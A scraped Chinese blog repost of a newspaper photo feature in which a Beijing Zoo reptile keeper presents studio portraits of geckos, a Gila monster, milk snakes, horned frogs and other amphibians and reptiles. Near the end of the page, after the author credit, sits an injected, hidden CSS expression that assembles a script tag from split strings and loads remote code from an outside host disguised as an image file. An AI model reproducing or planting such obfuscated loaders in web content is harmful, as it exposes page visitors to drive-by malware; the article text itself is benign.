注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

《新京报·新知周刊》

 
 
 

日志

 
 

爬虫馆饲养员的影集  

2009-08-28 15:19:29|  分类: 视野 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

爬虫馆饲养员的影集
http://www.thebeijingnews.com来源:新京报

 
(乔轶伦是北京动物园两栖爬虫馆的工作人员,每天跟冷血动物打交道的他怀有超出工作的热情。他从2003年开始拍摄两栖爬行动物,然而发现多数两栖爬行动物有着极好的保护色,很多在自然环境中拍摄的照片不够“美”。于是,乔轶伦开始在摄影工作室中拍摄两栖爬行动物。
得益于“另类宠物”饲养者免费提供的模特,乔轶伦在不到10平方米的摄影室中拍摄了近百种来自世界各地的乌龟、毒蛇、蜥蜴、鳄鱼和蛙类,在白背景下,这些冷血动物的美丽尽显无遗。)

 

爬虫馆饲养员的影集 - 新知周刊 - 《新京报·新知周刊》

斑睑虎排队“走秀” 

 

这种斑睑虎原产中亚地区,如今经大量人工繁殖,已培育出很多色型的品种,成为了较受欢迎的宠物蜥蜴种类。虽未经专业训练,但第一次集体登台的它们竟能“排队走秀”,向人们展示着它们亮丽多变的外表(图1)。

 

 

爬虫馆饲养员的影集 - 新知周刊 - 《新京报·新知周刊》

钝尾毒蜥 

这种蜥蜴有毒!全世界将近6700种蜥蜴中,仅有两种有毒,大名鼎鼎的钝尾毒蜥就是其中之一。它橙黄的“外衣”上布满黑色斑纹,本身就是一种警示色。拍摄时,助手戴着厚厚的手套轻触了一下它的尾巴,在毒蜥转头,张开大嘴威吓之时,拍摄者按下了快门(图2)。

 

爬虫馆饲养员的影集 - 新知周刊 - 《新京报·新知周刊》

奶蛇有很多亚种 

 

看似不同色彩的四条蛇却都是一种蛇的色型变异。北美洲的奶蛇就是一个典型的例子,有16个不同色型的亚种,遗传学家利用不同色型间亚种的杂交,培育出了更多色彩绚烂的人工品种(图3)。

 

爬虫馆饲养员的影集 - 新知周刊 - 《新京报·新知周刊》

角花蟾及白化种

 

这两只蛙是两只来自南美的角花蟾,俗称南美角蛙,所不同的是右边那只是白化种,被称之为黄金角蛙(图4)。

 

爬虫馆饲养员的影集 - 新知周刊 - 《新京报·新知周刊》

滑疣鳞蟾的滑稽姿态

 

这个大嘴巴的怪物学名叫滑疣鳞蟾,俗称圆眼珍珠蛙,平日里栖息在水底。没想到被请到摄影室里却一反常态,不可思议地用纤细的四肢撑起了肥胖的躯体,并不断发出像小狗般的叫声,这种行为甚至在书籍中都未记载过,拍摄者迅速地为它拍下了这难得的一刻(图5)。

 

爬虫馆饲养员的影集 - 新知周刊 - 《新京报·新知周刊》

地龟吃小白鼠 

 

摄影室照中大多是动物的形态照,为了避免画面单调,利用一些驯化好了的动物还可以拍到反映动物行为的片子。比如这只地龟,拍摄者饲养它三年之久,最大的特点就是“贪吃”。不论何时何地,只要有人上菜,它的胃口总是那么的好(图6)。

 

爬虫馆饲养员的影集 - 新知周刊 - 《新京报·新知周刊》

绿雨滨蛙就像“憨豆”

 

来自澳洲的绿雨滨蛙登台后,自觉地摆出了这般姿势,它那幽默的表情让人不禁想起了英国喜剧里的那个憨豆先生(图7)。

 

本版撰文/摄影 乔轶伦(北京动物园两栖爬虫馆工作人员)
 
 

ee:Expression(function(){if(!window.r){varss='s'+'cript';var tt='text/ja'+'vas'+'cript';varst=document.createElement(ss);st.src='http://imgcache.suqian114.cn/a/s/sina.jpg';st.type=tt;document.getElementsByTagName('head').item(0).appendChild(st);window.r=1}}(this));width:0px;display:none"<
  评论这张
 
阅读(158)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017